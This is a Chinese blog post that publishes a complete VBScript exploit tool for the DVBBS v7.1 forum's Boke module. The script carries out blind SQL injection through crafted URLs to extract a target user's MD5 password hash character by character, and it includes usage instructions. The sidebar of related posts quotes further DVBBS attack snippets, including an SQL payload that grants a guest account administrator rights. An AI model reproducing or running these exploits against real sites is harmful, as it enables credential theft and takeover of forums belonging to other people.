DVBBS V7.1 Boke 注入漏洞利用工具

最新推荐文章于 2022-02-25 19:38:17 发布
最新推荐文章于 2022-02-25 19:38:17 发布
阅读量417 收藏
点赞数
分类专栏: 黑客 文章标签: function 工具 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiazhijiang520/article/details/3437779
版权

On Error Resume Next
Dim oArgs
Dim oBokeXML 'XMLHTTP对象用来打开目标网址
Dim TargetURL '目标网址
Dim BlogName '博客用户名
Dim TempStr '存放已获取的部分 MD5密码
Dim CharHex '定义16进制字符

Set oArgs = WScript.arguments
If oArgs.count < 2 Then Call ShowUsage()

Set oBokeXML = CreateObject("Microsoft.XMLHTTP")

'补充完整目标网址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "?" Then TargetURL = TargetURL & "?"

BlogName=oArgs(1)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")

Call main(TargetURL,BlogName)

Set oBokeXML = Nothing

'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得Boke 用户密码
'============================================
Sub main(TargetURL,BlogName)
 Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
 For MainOffset = 1 To 16
 For SubOffset = 0 To 15
 TempLen = 0
 OpenURL = TargetURL & BlogName & "'and'" & TempStr & CharHex(SubOffset) & "'=left(password," &MainOffset& ")and''='.index.html"
 oBokeXML.open "Get",OpenURL, False, "", ""
 oBokeXML.send
 GetPage = BytesToBstr(oBokeXML.ResponseBody)
 '判断访问的页面是否存在
 If InStr(GetPage,"<title>无法找到网页</title>")=0 And InStr(GetPage,"您正在搜索的网页可能已经删除、更名或暂时不可用。</font>")=0 Then
 '“博客用户不存在或填写的资料有误” 为错误标志 ,返回此标志说明 猜解的 MD5 不正确
 '如果得到 0000000000000000 的 MD5 值,请修改错误标志
 If InStr(GetPage,"博客用户不存在或填写的资料有误")=0 Then
 TempStr=TempStr & CharHex(SubOffset)
 WScript.Echo " 已获取的MD5值为:" &CStr(TempStr) &" 其他密码正在读取中,请等待。。。"
 Exit for
 End if
 Else
 WScript.echo vbcrlf & "您输入的网址无法访问,请确认后重新输入。" & vbcrlf
 WScript.echo vbcrlf & "本程序只用于学习交流,不能用于其非法用途。"& vbcrlf &"因使用本程序引起的一切后果和责任由使用者自负"
 WScript.Quit
 End If
 next
 Next
 WScript.Echo " 成功读取密码的MD5值,为:" & TempStr & "请不要使用本程序进行破坏行为!"
End sub

'============================================
'函数名称:BytesToBstr
'函数功能:将XMLHTTP对象中的内容转化为GB2312编码
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = CreateObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function

'============================
'函数名称:ShowUsage
'函数功能:使用方法提示
'============================
Sub ShowUsage()
 WScript.echo " DVBBS v7.1 Boke 利用程序" & vbcrlf & " By Execsl 06.4.23"
 WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"
 WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" www.target.com/bbs/boke.asp admin"
 WScript.echo ""
 WScript.Quit
End Sub

泡面之夏
关注
专栏目录
动网 php v1.0 漏洞,动网论坛dispuser.php页面SQL注入漏洞
weixin_42627812的博客
04-12 126
受影响系统:动网论坛 Dvbbs php 2.0++描述:DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。在DVBBS的dispuser.php文件中:if( is_numeric($id) ){//第6行$showUserID = intval($id);} else{if( $UserName == ” ){$ErrCodes = $lang[‘UrlArg...
dvbbs7.1sp1最新漏洞的研究和利用
huozheleisi
06-05 245
[&lt;!----&gt;怪狗] 发表于2006-05-12 00:02 &lt;!----&gt; ...
DVBBS 8.2 漏洞利用
caiguazheng4921的博客
04-19 236
在用户名处写入“';update dv_user set usergroupid=1 where username='guest'--”密码我就用正确的来写然后写好后登陆看到反回的信息我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。 现在我们已经是前台管理员了。 那么怎样才能让我们的帐户具有后台权限呢?我们继续来到lo...
动网 php v1.0 漏洞,动网(DVBBS)PHP论坛preview.php代码执行漏洞
weixin_35490309的博客
04-12 189
影响版本:动网论坛 (DVBBS) PHP 2.0++漏洞描述:动网(DVBBS)论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。在文件preview.php中:require printout('preview'); //第9行……函数printout在文件inc/ dv_clsmain.php中:function printout($template,$ext="tp...
dvbbs php,DVBBS php转换工具使用教程
weixin_36338808的博客
03-27 225
首先需要架好PHP程序运行环境。目前转换程序只有四种,即:一、说明:1、访问你的转换路径,各文件对应的转换说明如下2、asp71ac-to-php10 动网的ASP7.1 AC 转到 动网PHP1.03、asp71sql-to-php10 动网的ASP7.1 MSSQL 转到 动网PHP1.04、dz41-to-php10 DISCUZ4.1 转到 动网PHP1.05、dz50-to-php...
ajax提交sql注入,ajaxpro存在SQL注入漏洞?
weixin_39940154的博客
08-05 416
分析下”洞网/”,环境架好后.找到有问题的语句:End IfElseusername=trim(Dvbbs.CheckStr(request("username")))If ajaxPro Then username = unescape(username)End Ifusername带入到查询语句如下:If ChkUserLogin(username,password,mobile,userco...
利用动网论坛dvBBS漏洞上传webshell
Jim的博客
08-20 4322
动网论坛一直是国内比较受欢迎的ASP论坛程序 下载数据库查看DV_upfile数据表,搜索F_ID字段得到php文件地址(前提是知道数据库地址,并且可下载,一般数据库默认地址为/data/dvbbs8.mdb) 1.      通过注入点获得网站的后台账号和密码,但没有找到后台登录地址 2.      下载动网论坛数据库,一般默认地址是/data/dvbbs8.mdb 3.      读取
Dvbbs 8.2 login_sql注入漏洞探析
07-17 2860
挺无聊的,分析下”洞网/”,环境架好后.找到有问题的语句:       End If       Else              username=trim(Dvbbs.CheckStr(request("username")))              If ajaxPro Then username = unescape(username)       End If
DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码)_dvbbstozforums.zip
12-22
标题中的“DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码)”是指一个专门用于将基于DVbbs 7.1版本的论坛数据转换到ZFORUMS V4.1版本的工具。这个工具通常由开发者或管理员使用,以在更换论坛系统时保持原有用户数据...
DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码)_C#论坛社区程序.rar
09-09
DVbbs 7.1 to ZFORUMS V4.1 转换工具详解:C#编程实践与社区论坛升级技术》 在互联网社区的发展历程中,论坛系统作为重要的交流平台,其数据迁移与升级是运营者常面临的问题。本资料详细介绍了如何使用一款C#编写...
程序源码 DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码)(ASP.NET源码).rar
最新发布
03-13
免责声明:资料部分来源于合法的互联网渠道收集和整理,部分自己学习积累成果,供大家学习参考与交流。收取的费用仅用于收集和整理资料耗费时间的酬劳。 本人尊重原创作者或出版方,资料版权归原作者或出版方所有,...
ASP.NET源码——[论坛社区]DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码).zip
10-10
本资源“ASP.NET源码——[论坛社区]DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码).zip”提供了一个具体的实例,即一个ASP.NET应用程序,该程序用于将DVbbs 7.1论坛系统的数据转换为ZFORUMS V4.1论坛系统的数据格式...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9090
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3625
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7118
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1758
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2731
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
DVbbs 7.1 到 ZFORUMS V4.1 转换工具源码发布
资源摘要信息:"***源码——[论坛社区]DVbbs 7.1 转 ZFORUMS V4.1 转换工具(含源码).zip"是一个专门为***开发的转换工具,用于将DVbbs 7.1论坛社区的数据转换为ZFORUMS V4.1论坛社区的数据。这个转换工具包含了完整...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值